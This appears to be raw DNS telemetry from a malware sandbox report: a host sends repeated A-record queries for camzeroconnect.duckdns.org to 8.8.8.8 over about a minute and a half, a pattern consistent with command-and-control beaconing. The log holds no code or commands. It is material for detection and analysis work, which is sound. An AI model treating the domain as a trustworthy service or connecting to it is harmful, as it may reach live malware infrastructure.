                                                                                            Sep 27, 2024 14:02:19.938009977 CEST192.168.2.228.8.8.80x863fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.965308905 CEST192.168.2.228.8.8.80xcd4fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:20.987418890 CEST192.168.2.228.8.8.80xcd4fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.449182034 CEST192.168.2.228.8.8.80xc8f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.463200092 CEST192.168.2.228.8.8.80xc8f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.479163885 CEST192.168.2.228.8.8.80xc8f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.490087032 CEST192.168.2.228.8.8.80xc8f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:23.499460936 CEST192.168.2.228.8.8.80xc8f2Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.521554947 CEST192.168.2.228.8.8.80x71faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.529992104 CEST192.168.2.228.8.8.80x71faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.539876938 CEST192.168.2.228.8.8.80x71faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.551565886 CEST192.168.2.228.8.8.80x71faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:24.560522079 CEST192.168.2.228.8.8.80x71faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.586810112 CEST192.168.2.228.8.8.80x11cfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.594794989 CEST192.168.2.228.8.8.80x11cfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.604042053 CEST192.168.2.228.8.8.80x11cfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.612093925 CEST192.168.2.228.8.8.80x11cfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:25.619337082 CEST192.168.2.228.8.8.80x11cfStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.643081903 CEST192.168.2.228.8.8.80x4714Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.651241064 CEST192.168.2.228.8.8.80x4714Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.663522959 CEST192.168.2.228.8.8.80x4714Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.671418905 CEST192.168.2.228.8.8.80x4714Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:26.679497004 CEST192.168.2.228.8.8.80x4714Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.704106092 CEST192.168.2.228.8.8.80x34cbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.721134901 CEST192.168.2.228.8.8.80x34cbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.733119011 CEST192.168.2.228.8.8.80x34cbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.741099119 CEST192.168.2.228.8.8.80x34cbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:27.749089003 CEST192.168.2.228.8.8.80x34cbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:28.785058022 CEST192.168.2.228.8.8.80xc195Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.787377119 CEST192.168.2.228.8.8.80xc195Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.799376011 CEST192.168.2.228.8.8.80xc195Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.847320080 CEST192.168.2.228.8.8.80xc195Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:29.880956888 CEST192.168.2.228.8.8.80xc195Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:30.968007088 CEST192.168.2.228.8.8.80xf3faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.974327087 CEST192.168.2.228.8.8.80xf3faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.985910892 CEST192.168.2.228.8.8.80xf3faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:31.993592978 CEST192.168.2.228.8.8.80xf3faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:32.001812935 CEST192.168.2.228.8.8.80xf3faStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:36.987131119 CEST192.168.2.228.8.8.80xf153Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:36.995815992 CEST192.168.2.228.8.8.80xf153Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.003053904 CEST192.168.2.228.8.8.80xf153Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.010735989 CEST192.168.2.228.8.8.80xf153Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:37.017582893 CEST192.168.2.228.8.8.80xf153Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.029848099 CEST192.168.2.228.8.8.80xe446Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.037190914 CEST192.168.2.228.8.8.80xe446Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.045115948 CEST192.168.2.228.8.8.80xe446Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.053117990 CEST192.168.2.228.8.8.80xe446Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:38.061223030 CEST192.168.2.228.8.8.80xe446Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.074343920 CEST192.168.2.228.8.8.80xc307Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.081723928 CEST192.168.2.228.8.8.80xc307Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.088316917 CEST192.168.2.228.8.8.80xc307Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.095351934 CEST192.168.2.228.8.8.80xc307Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:39.101870060 CEST192.168.2.228.8.8.80xc307Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.124878883 CEST192.168.2.228.8.8.80x2d8cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.132148981 CEST192.168.2.228.8.8.80x2d8cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:40.139342070 CEST192.168.2.228.8.8.80x2d8cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.249063015 CEST192.168.2.228.8.8.80x2d8cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:41.256289959 CEST192.168.2.228.8.8.80x2d8cStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.281022072 CEST192.168.2.228.8.8.80x1bfaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.288268089 CEST192.168.2.228.8.8.80x1bfaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.295411110 CEST192.168.2.228.8.8.80x1bfaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.301851034 CEST192.168.2.228.8.8.80x1bfaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:42.309293032 CEST192.168.2.228.8.8.80x1bfaStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.361294031 CEST192.168.2.228.8.8.80x4d47Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.369215012 CEST192.168.2.228.8.8.80x4d47Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.475310087 CEST192.168.2.228.8.8.80x4d47Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.482686043 CEST192.168.2.228.8.8.80x4d47Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:43.489845991 CEST192.168.2.228.8.8.80x4d47Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.511938095 CEST192.168.2.228.8.8.80x3f03Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.519349098 CEST192.168.2.228.8.8.80x3f03Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.527199030 CEST192.168.2.228.8.8.80x3f03Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.535283089 CEST192.168.2.228.8.8.80x3f03Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:44.543648958 CEST192.168.2.228.8.8.80x3f03Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.563704014 CEST192.168.2.228.8.8.80xc50fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.573168993 CEST192.168.2.228.8.8.80xc50fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.585141897 CEST192.168.2.228.8.8.80xc50fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.597150087 CEST192.168.2.228.8.8.80xc50fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:45.609148979 CEST192.168.2.228.8.8.80xc50fStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.643217087 CEST192.168.2.228.8.8.80x8b3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.650613070 CEST192.168.2.228.8.8.80x8b3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.658345938 CEST192.168.2.228.8.8.80x8b3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.665421009 CEST192.168.2.228.8.8.80x8b3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:46.673024893 CEST192.168.2.228.8.8.80x8b3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.690587044 CEST192.168.2.228.8.8.80xfc62Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.698303938 CEST192.168.2.228.8.8.80xfc62Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.706152916 CEST192.168.2.228.8.8.80xfc62Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.715298891 CEST192.168.2.228.8.8.80xfc62Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:47.722769022 CEST192.168.2.228.8.8.80xfc62Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.752840996 CEST192.168.2.228.8.8.80x3016Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.863837004 CEST192.168.2.228.8.8.80x3016Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.875737906 CEST192.168.2.228.8.8.80x3016Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.885143042 CEST192.168.2.228.8.8.80x3016Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:48.897203922 CEST192.168.2.228.8.8.80x3016Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.916645050 CEST192.168.2.228.8.8.80x5fbdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.925184011 CEST192.168.2.228.8.8.80x5fbdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.937275887 CEST192.168.2.228.8.8.80x5fbdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.949206114 CEST192.168.2.228.8.8.80x5fbdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:49.961222887 CEST192.168.2.228.8.8.80x5fbdStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:50.979044914 CEST192.168.2.228.8.8.80x51b4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:50.986815929 CEST192.168.2.228.8.8.80x51b4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:50.994090080 CEST192.168.2.228.8.8.80x51b4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:51.002417088 CEST192.168.2.228.8.8.80x51b4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:51.010415077 CEST192.168.2.228.8.8.80x51b4Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.397284985 CEST192.168.2.228.8.8.80x3777Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.404021978 CEST192.168.2.228.8.8.80x3777Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.411180973 CEST192.168.2.228.8.8.80x3777Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.417761087 CEST192.168.2.228.8.8.80x3777Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:52.424277067 CEST192.168.2.228.8.8.80x3777Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.441936970 CEST192.168.2.228.8.8.80x848eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.449198008 CEST192.168.2.228.8.8.80x848eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.461230993 CEST192.168.2.228.8.8.80x848eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.469131947 CEST192.168.2.228.8.8.80x848eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:53.477123976 CEST192.168.2.228.8.8.80x848eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.525249004 CEST192.168.2.228.8.8.80xc0e3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.532608986 CEST192.168.2.228.8.8.80xc0e3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.539812088 CEST192.168.2.228.8.8.80xc0e3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.546993971 CEST192.168.2.228.8.8.80xc0e3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:54.554827929 CEST192.168.2.228.8.8.80xc0e3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.695678949 CEST192.168.2.228.8.8.80xca88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.703037977 CEST192.168.2.228.8.8.80xca88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.718578100 CEST192.168.2.228.8.8.80xca88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.729657888 CEST192.168.2.228.8.8.80xca88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:55.736984015 CEST192.168.2.228.8.8.80xca88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:56.756722927 CEST192.168.2.228.8.8.80x732bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:56.767497063 CEST192.168.2.228.8.8.80x732bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:57.773524046 CEST192.168.2.228.8.8.80x732bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:59.785926104 CEST192.168.2.228.8.8.80x732bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:02:59.793551922 CEST192.168.2.228.8.8.80x732bStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.808397055 CEST192.168.2.228.8.8.80x73b7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.816200972 CEST192.168.2.228.8.8.80x73b7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.832458973 CEST192.168.2.228.8.8.80x73b7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.844227076 CEST192.168.2.228.8.8.80x73b7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:00.859249115 CEST192.168.2.228.8.8.80x73b7Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.903004885 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.910816908 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.917651892 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.924629927 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:01.931567907 CEST192.168.2.228.8.8.80xbc93Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.083863974 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.092003107 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.101176023 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.115180016 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:03.129276037 CEST192.168.2.228.8.8.80x2de3Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.158838034 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.165730000 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.173168898 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.180490017 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:04.187815905 CEST192.168.2.228.8.8.80x1a88Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:05.208309889 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.213185072 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.220741034 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:06.227938890 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:10.217060089 CEST192.168.2.228.8.8.80x4b51Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.251039982 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.258600950 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:11.268968105 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.280126095 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:13.293257952 CEST192.168.2.228.8.8.80xc973Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.346698999 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.354322910 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:14.362245083 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.465377092 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:15.477320910 CEST192.168.2.228.8.8.80x2a54Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.513539076 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:20.727327108 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.735188961 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.744133949 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:21.750930071 CEST192.168.2.228.8.8.80x5bfbStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.780183077 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.788068056 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.802196980 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:22.811011076 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:26.805227995 CEST192.168.2.228.8.8.80x134eStandard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.858911991 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.868410110 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:27.877238035 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.878451109 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:29.885818005 CEST192.168.2.228.8.8.80xd342Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:30.901026964 CEST192.168.2.228.8.8.80x5a59Standard query (0)camzeroconnect.duckdns.orgA (IP address)IN (0x0001)false
